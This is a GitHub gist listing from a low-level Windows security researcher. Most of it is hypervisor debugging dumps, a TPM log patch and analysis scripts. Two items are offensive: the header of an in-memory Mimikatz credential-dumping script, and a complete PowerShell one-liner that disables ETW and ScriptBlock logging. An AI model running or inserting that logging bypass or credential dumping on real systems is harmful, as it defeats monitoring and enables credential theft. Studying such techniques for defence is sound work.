Skip to content

Instantly share code, notes, and snippets.

@tandasat
tandasat / hvci_vpid1.log
Created February 9, 2024 16:51
VMCS configurations for NTOS w/ HVCI (VPID=1), Secure Kernel (VPID=2), and a child partition w/o HVCI (VPID=3)
View hvci_vpid1.log
kd> !dump_vmcs
0x0000000000000001 Virtual-processor identifier (VPID)
***** FAILED ***** Posted-interrupt notification vector
0x0000000000000000 EPTP index
***** FAILED ***** HLAT prefix size
***** FAILED ***** Last PID-pointer
0x000000000000002b Guest ES selector
0x0000000000000010 Guest CS selector
0x0000000000000018 Guest SS selector
0x000000000000002b Guest DS selector
@tandasat
tandasat / parse_drtm_log.patch
Created February 7, 2024 15:44
A patch for https://github.com/microsoft/TSS.MSR/tree/main to parse DRTM TPM logs (WBCL)
View parse_drtm_log.patch
diff --git a/PCPTool.v11/exe/SDKSample.cpp b/PCPTool.v11/exe/SDKSample.cpp
index edcc966..984690f 100644
--- a/PCPTool.v11/exe/SDKSample.cpp
+++ b/PCPTool.v11/exe/SDKSample.cpp
@@ -1813,7 +1813,7 @@ log can be used to calculate the PCRs in the TPM.
{
goto Cleanup;
}
- if(FAILED(hr = Tbsi_Get_TCG_Log(hContext, NULL, &cbLog)))
+ if(FAILED(hr = Tbsi_Get_TCG_Log_Ex(TBS_TCGLOG_DRTM_CURRENT, NULL, &cbLog)))
@tandasat
tandasat / !dump_ept.txt
Last active June 21, 2023 00:23
EPT setup dumped on Windows 10.0.22621.1848 using hvext: https://github.com/tandasat/hvext
View !dump_ept.txt
kd> !dump_ept
Current EPT pointer 0x11b8bc09e
GPA PA Flags
0x0 - 0x1000 -> Identity ------WR
0x1000 - 0x2000 -> Identity ---U--WR
0x3000 - 0x9f000 -> Identity ---U--WR
0x9f000 - 0x100000 -> Identity ------WR
0x100000 - 0xa46000 -> Identity ---U--WR
0xa47000 - 0x4c00000 -> Identity ---U--WR
0x5000000 - 0xa201000 -> Identity ---U--WR
@tandasat
tandasat / GetPhysicalMemoryRanges.c
Last active April 29, 2023 14:56
Part of snapshot taking code in C
View GetPhysicalMemoryRanges.c
/**
* @brief Returns an array of physical memory address ranges on the system.
*
* @param This - The pointer to the platform API interface.
* @param RangeCount - The pointer to receive the number of entries in the returned
* pointer on success.
* @return The pointer to the array of ranges on success. This must be freed with
* Freed with FREE_CONTIGUOUS_PAGES. On failure, NULL.
*/
STATIC
View dump_vmcs.js
"use strict";
// This script implements the !dump_vmcs command that displays values of the all
// fields in the current VMCS. The processor must be in VMX-root operation with
// an active VMCS.
//
// As a reference, there are some other implementations of the same concept. The
// author is now aware of those two at least. Check them out as it may fit your
// need better.
// - https://github.com/ergot86/crap/blob/main/hyperv_stuff.js (Windbg JavaScript)
@tandasat
tandasat / list_first_instruction.py
Created June 26, 2021 23:13
IDA script to show the first instruction of the all functions
View list_first_instruction.py
from idautils import *
from idaapi import *
from idc import *
for funcea in Functions():
functionName = get_func_name(funcea)
for (startea, endea) in Chunks(funcea):
print(f"{startea:08x} {GetDisasm(startea)} : {functionName}")
@tandasat
tandasat / CheckGuestVmcsFieldsForVmEntry.c
Last active December 17, 2023 01:27
Simulation of checks performed as per 26.3 CHECKING AND LOADING GUEST STATE
View CheckGuestVmcsFieldsForVmEntry.c
/**
* @file CheckGuestVmcsFieldsForVmEntry.c
* @author Satoshi Tanda (tanda.sat@gmail.com)
* @brief Checks validity of the guest VMCS fields for VM-entry as per
* 26.3 CHECKING AND LOADING GUEST STATE
* @version 0.1
* @date 2021-02-20
*
* @details This file implements part of checks performed by a processor during
* VM-entry as CheckGuestVmcsFieldsForVmEntry(). This can be called on VM-exit
View GuestAgent.c
/*!
@file GuestAgent.c
@brief GuestAgent code.
@author Satoshi Tanda
@copyright Copyright (c) 2020 - , Satoshi Tanda. All rights reserved.
*/
#include "GuestAgent.h"
View Invoke-BypassingMimikatz.ps1
#
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
@tandasat
tandasat / KillETW.ps1
Last active January 23, 2024 02:39
Disable ETW of the current PowerShell session
View KillETW.ps1
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)